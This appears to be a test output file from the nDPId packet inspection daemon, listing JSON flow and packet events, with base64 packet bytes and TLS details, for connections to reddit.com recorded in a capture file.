+00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1605291684551,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291684551,"pkt":"qtsDr8lk5EKm5WPyht1gB3LfACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PABuxF7CxV06NLngBAB+1zSAAABAQgKqXTgG8LXMoo="} 
+01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684452,"flow_last_seen":1605291684551,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01269{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291684452,"flow_last_seen":1605291684551,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":457,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, 
CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}} +01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684451,"flow_last_seen":1605291684551,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291684551,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"safebrowsing.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291684481,"flow_last_seen":1605291684552,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291684552,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01000{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291684481,"flow_last_seen":1605291684592,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291684592,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01270{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291684481,"flow_last_seen":1605291684593,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291684593,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}} +00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1605291686035,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686035,"pkt":"qtsDr8lk5EKm5WPyht1gDzZzACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PIBu+DxzH8AAAAAoAL9INmFAAACBAWgBAIICql05ecAAAAAAQMDBw=="} 
+00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1605291686035,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686035,"pkt":"qtsDr8lk5EKm5WPyht1gCjLcACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PQBu\/EwLy4AAAAAoAL9IGaWAAACBAWgBAIICql05ecAAAAAAQMDBw=="} +00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1605291686035,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686035,"pkt":"qtsDr8lk5EKm5WPyht1gAChDACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PYBu+yXuQoAAAAAoAL9IOFQAAACBAWgBAIICql05ecAAAAAAQMDBw=="} +00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1605291686035,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686035,"pkt":"qtsDr8lk5EKm5WPyht1gCVbzACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PgBu3BHTUsAAAAAoAL9IMleAAACBAWgBAIICql05ecAAAAAAQMDBw=="} 
+00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":283,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1605291686035,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686035,"pkt":"qtsDr8lk5EKm5WPyht1gB\/ybACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PoBu\/q4YysAAAAAoAL9ICkLAAACBAWgBAIICql05ecAAAAAAQMDBw=="} +00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":284,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686035,"flow_last_seen":1605291686035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686035,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1605291686035,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686035,"pkt":"qtsDr8lk5EKm5WPyht1gAreKACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PwBu8WSVasAAAAAoAL9IGuvAAACBAWgBAIICql05ecAAAAAAQMDBw=="} +00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":417,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686060,"flow_last_seen":1605291686060,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1605291686060,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686060,"pkt":"qtsDr8lk5EKm5WPyht1gBKPwACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3P4Bu+9x1NYAAAAAoAL9IMKJAAACBAWgBAIICql05gAAAAAAAQMDBw=="} 
+00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":418,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686060,"flow_last_seen":1605291686060,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":418,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1605291686060,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686060,"pkt":"qtsDr8lk5EKm5WPyht1gDoxGACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QABu3ytfXMAAAAAoAL9IIyvAAACBAWgBAIICql05gAAAAAAAQMDBw=="} +00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686060,"flow_last_seen":1605291686060,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1605291686060,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686060,"pkt":"qtsDr8lk5EKm5WPyht1gBLbYACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QIBuwaOmx4AAAAAoAL9IOUhAAACBAWgBAIICql05gAAAAAAAQMDBw=="} +00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":420,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686060,"flow_last_seen":1605291686060,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1605291686060,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686060,"pkt":"qtsDr8lk5EKm5WPyht1gCVnRACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QQBuwBg34wAAAAAoAL9IKbfAAACBAWgBAIICql05gAAAAAAAQMDBw=="} 
+00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686064,"flow_last_seen":1605291686064,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686064,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1605291686064,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686064,"pkt":"qtsDr8lk5EKm5WPyht1gBAJCACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QYBu4l3q2EAAAAAoAL9IFHtAAACBAWgBAIICql05gQAAAAAAQMDBw=="} +00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686064,"flow_last_seen":1605291686064,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686064,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1605291686064,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686064,"pkt":"qtsDr8lk5EKm5WPyht1gAj4aACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QgBuwHFZiEAAAAAoAL9IB7eAAACBAWgBAIICql05gQAAAAAAQMDBw=="} +00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":423,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686064,"flow_last_seen":1605291686064,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686064,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1605291686064,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686064,"pkt":"qtsDr8lk5EKm5WPyht1gCQMdACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QoBuxlyLXsAAAAAoAL9ID\/VAAACBAWgBAIICql05gQAAAAAAQMDBw=="} 
+00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291686064,"flow_last_seen":1605291686064,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291686064,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1605291686064,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686064,"pkt":"qtsDr8lk5EKm5WPyht1gBZ0wACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3QwBu2zjowUAAAAAoAL9IHbXAAACBAWgBAIICql05gQAAAAAAQMDBw=="} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1605291686065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686065,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc9JWtCtDxMC8voBJXgHBaAAACBAV4AQMDAwQCCArC1ziiqXTl5w=="} 
+00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1605291686065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291686065,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvc8oSMMqHg8cyAoBJXgMyZAAACBAV4AQMDAwQCCArC1ziiqXTl5w=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1605291686065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686065,"pkt":"qtsDr8lk5EKm5WPyht1gCjLcACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PQBu\/EwLy+VrQrRgBAB+\/RNAAABAQgKqXTmBcLXOKI="} +00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":428,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1605291686065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291686065,"pkt":"qtsDr8lk5EKm5WPyht1gDzZzACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3PIBu+DxzICEjDKigBAB+1CNAAABAQgKqXTmBcLXOKI="} 
